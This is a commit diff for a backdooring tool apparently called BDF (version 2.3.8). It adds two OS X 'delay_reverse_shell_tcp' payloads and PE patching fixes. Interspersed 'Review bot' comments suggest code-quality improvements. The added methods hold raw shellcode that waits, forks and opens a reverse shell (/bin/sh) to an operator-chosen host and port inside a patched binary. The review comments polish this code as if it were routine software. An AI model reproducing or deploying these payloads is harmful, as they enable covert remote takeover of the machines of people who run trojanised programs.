Commit b4ee9e50 authored by Mati's avatar Mati

Imported Upstream version 2.3.8

parent cbd41fae
......@@ -280,6 +280,18 @@ by one.
Usage: payloadtest.py binary HOST PORT
```
####1/1/2015
Happy New Year!
Two new OS X payloads! The delay: delay_reverse_shell_tcp
-B 30 --> delay the payload for 30 seconds, main code runs right away.
Setting of firm capstone commit for building into BDF, capstone 'Next' repo
breaks BDF.
Fixes to support cython capstone implementation null byte truncation issue
####12/17/2014
......
......@@ -62,7 +62,7 @@ def signal_handler(signal, frame):
class bdfMain():
version = """\
2.3.5
2.3.8
"""
author = """\
......
......@@ -10,7 +10,7 @@ git clone https://github.com/aquynh/capstone/
cd capstone
git checkout master
git checkout b53a59af53ffbd5dbe8dbcefba41a00cf4fc7469
./make.sh
......
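Review bot: The pinned checkout on the line `git checkout b53a59af53ffbd5dbe8dbcefba41a00cf4fc7469` is not checked for failure, so if the clone does not contain that commit the script falls through to `./make.sh` and builds whatever HEAD the preceding `git checkout master` left (presumably the branch tip). Since the point of pinning is a reproducible, known-good capstone build, a failed checkout should stop the script: `git checkout b53a59af53ffbd5dbe8dbcefba41a00cf4fc7469 || exit 1`. A one-line comment above it recording why this commit is pinned (the README hunk says the capstone 'Next' repo breaks BDF) would keep the next maintainer from bumping it back to master. The same unchecked checkout appears in the second install-script hunk (the `git pull` block); the surrounding script continues outside both hunks.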
......@@ -58,6 +58,44 @@ class macho_intel32_shellcode():
def returnshellcode(self):
return self.shellcode
def delay_reverse_shell_tcp(self):
#Modified from metasploit
if self.PORT is None:
print ("Must provide port")
return False
if self.HOST is None:
print ("This payload requires a HOST parameter -H")
return False
self.shellcode2 = "\xB8\x74\x00\x00\x02\xcd\x80" # put system time in eax
self.shellcode2 += "\x05" # add eax, 15 for seconds
self.shellcode2 += struct.pack("<I", self.BEACON)
self.shellcode2 += ("\x89\xC3" # mov ebx, eax
"\xB8\x74\x00\x00\x02\xcd\x80" # put system time in eax
"\x39\xD8" # cmp eax, ebx
"\x0F\x85\xf1\xff\xff\xff" # jne back to system time
)
self.shellcode2 += "\x68"
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += "\x68\xff\x02"
self.shellcode2 += struct.pack(">H", self.PORT)
self.shellcode2 += ("\x89\xe7\x31\xc0\x50"
"\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62"
"\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x54\x53"
"\x50\xb0\x3b\xcd\x80"
)
self.shellcode1 = ("\xB8\x02\x00\x00\x02\xcd\x80\x85\xd2")
self.shellcode1 += "\x0f\x84"
if self.jumpLocation < 0:
self.shellcode1 += struct.pack("<I", len(self.shellcode1) + 0xffffffff + self.jumpLocation)
else:
self.shellcode1 += struct.pack("<I", len(self.shellcode2) + self.jumpLocation)
self.shellcode = self.shellcode1 + self.shellcode2
return (self.shellcode1 + self.shellcode2)
def beaconing_reverse_shell_tcp(self):
#Modified from metasploit
if self.PORT is None:
......
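Review bot: The comment `# add eax, 15 for seconds` on the `self.shellcode2 += "\x05"` line is stale: the immediate packed on the next line is `struct.pack("<I", self.BEACON)`, so the delay is whatever BEACON holds, not 15. Unlike PORT and HOST, BEACON is not validated before packing; if it is unset, struct.pack raises instead of printing a usage message, so a guard matching the two above, `if self.BEACON is None: print ("This payload requires a delay -B"); return False`, keeps the failure mode consistent (where BEACON is assigned is outside the hunk). The same stale comment appears in the 64-bit delay_reverse_shell_tcp hunk (`# add rax, 15 for seconds`). A short docstring stating that the method assembles the delay loop plus connect-back body into self.shellcode2, the fork/jump stub into self.shellcode1, stores their concatenation in self.shellcode and returns it (or False when PORT/HOST are missing) would document the contract the caller relies on.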
......@@ -58,6 +58,50 @@ class macho_intel64_shellcode():
def returnshellcode(self):
return self.shellcode
def delay_reverse_shell_tcp(self):
if self.PORT is None:
print ("Must provide port")
return False
if self.HOST is None:
print ("This payload requires a HOST parameter -H")
return False
#From metasploit LHOST=127.0.0.1 LPORT=8080 Reverse Tcp
self.shellcode2 = "\xB8\x74\x00\x00\x02\x0f\x05" # put system time in rax
self.shellcode2 += "\x48\x05"
self.shellcode2 += struct.pack("<I", self.BEACON) # add rax, 15 for seconds
self.shellcode2 += ("\x48\x89\xC3" # mov rbx, rax
"\xB8\x74\x00\x00\x02\x0f\x05" # put system time in rax
"\x48\x39\xD8" # cmp rax, rbx
"\x0F\x85\xf0\xff\xff\xff" # jne back to system time
)
self.shellcode2 += ("\xb8"
"\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05\x49"
"\x89\xc4\x48\x89\xc7\xb8\x62\x00\x00\x02\x48\x31\xf6\x56\x48\xbe"
"\x00\x02"
)
self.shellcode2 += struct.pack(">H", self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x56\x48\x89\xe6\x6a\x10\x5a\x0f"
"\x05\x4c\x89\xe7\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"
"\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8\x3b\x00\x00\x02"
"\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x8b\x3c"
"\x24\x48\x31\xd2\x52\x57\x48\x89\xe6\x0f\x05"
)
self.shellcode1 = ("\xB8\x02\x00\x00\x02\x0f\x05\x85\xd2") # FORK()
self.shellcode1 += "\x0f\x84" # \x4c\x03\x00\x00" # <-- Points to LC_MAIN/LC_UNIXTREADS offset
if self.jumpLocation < 0:
self.shellcode1 += struct.pack("<I", len(self.shellcode1) + 0xffffffff + self.jumpLocation)
else:
self.shellcode1 += struct.pack("<I", len(self.shellcode2) + self.jumpLocation)
self.shellcode = self.shellcode1 + self.shellcode2
return (self.shellcode1 + self.shellcode2)
def reverse_shell_tcp(self):
if self.PORT is None:
print ("Must provide port")
......
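Review bot: The line `self.shellcode1 += "\x0f\x84" # \x4c\x03\x00\x00" # <-- Points to LC_MAIN/LC_UNIXTREADS offset` carries a commented-out byte string that no longer reflects what is emitted, since the if/else immediately below computes the displacement from jumpLocation. Replacing it with a comment that states the intent, `self.shellcode1 += "\x0f\x84"  # jz rel32; displacement to the original entry point is packed below`, removes the dead bytes without losing the note. The method otherwise mirrors the 32-bit version line for line apart from the opcode strings, which is worth a note so the two are kept in step when either is changed.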
......@@ -81,12 +81,20 @@ class intelCore():
self.count = 0
for k in md.disasm(self.f.read(12), self.flItms['VrtStrtngPnt']):
self.count += k.size
_bytes = bytearray(b'')
if len(k.bytes) < k.size:
_bytes = bytearray(b"\x00" * (k.size - len(k.bytes)))
value_bytes = k.bytes + _bytes
self.flItms['ImpList'].append([int(hex(k.address).strip('L'), 16),
k.mnemonic.encode("utf-8"),
k.op_str.encode("utf-8"),
int(hex(k.address).strip('L'), 16) + k.size,
k.bytes,
value_bytes,
k.size])
if self.count >= 6 or self.count % 5 == 0 and self.count != 0:
break
......@@ -103,12 +111,20 @@ class intelCore():
md = Cs(CS_ARCH_X86, CS_MODE_64)
for k in md.disasm(self.f.read(12), self.flItms['VrtStrtngPnt']):
self.count += k.size
_bytes = bytearray(b'')
if len(k.bytes) < k.size:
_bytes = bytearray(b"\x00" * (k.size - len(k.bytes)))
value_bytes = k.bytes + _bytes
self.flItms['ImpList'].append([int(hex(k.address).strip('L'), 16),
k.mnemonic.encode("utf-8"),
k.op_str.encode("utf-8"),
int(hex(k.address).strip('L'), 16) + k.size,
k.bytes,
value_bytes,
k.size])
if self.count >= 6 or self.count % 5 == 0 and self.count != 0:
break
......@@ -361,7 +377,7 @@ class intelCore():
resumeExe += "\x25"
resumeExe += self.compliment_me # zero out EAX
resumeExe += "\x05" # ADD
resumeExe += struct.pack('=i', ReturnTrackingAddress)
resumeExe += struct.pack('<I', ReturnTrackingAddress)
resumeExe += "\x50" # push eax
resumeExe += "\x25" # zero out EAX
resumeExe += self.compliment_you
......
......@@ -430,7 +430,7 @@ class pebin():
self.binary.write(struct.pack('<I', self.flItms['NewSizeOfImage']))
self.binary.seek(self.flItms['BoundImportLocation'])
if self.flItms['BoundImportLOCinCode'] != 0:
self.binary.write(struct.pack('=i', self.flItms['BoundImportLOCinCode'] + 40))
self.binary.write(struct.pack('<I', self.flItms['BoundImportLOCinCode'] + 40))
self.binary.seek(self.flItms['BeginSections'] +
40 * self.flItms['NumberOfSections'], 0)
self.binary.write(self.flItms['NewSectionName'] +
......
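Review bot: The change from `'=i'` to `'<I'` on the `self.flItms['BoundImportLOCinCode'] + 40` write pins the field to the 4-byte little-endian layout the PE header requires regardless of host, but it also changes the accepted range: struct.pack('<I') raises struct.error for a negative value that '=i' accepted. That is the safer outcome for a file offset, and a comment makes it deliberate: `# PE header fields are fixed 4-byte LE; '<I' also rejects negative/out-of-range offsets instead of encoding them`. The same consideration applies to the `'<I'` change for ReturnTrackingAddress in the third intelCore hunk. The enclosing method continues outside the hunk.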
......@@ -12,7 +12,7 @@ cd capstone
if [[ `git pull` != "Already up-to-date." ]]; then
git checkout master
git checkout b53a59af53ffbd5dbe8dbcefba41a00cf4fc7469
./make.sh
......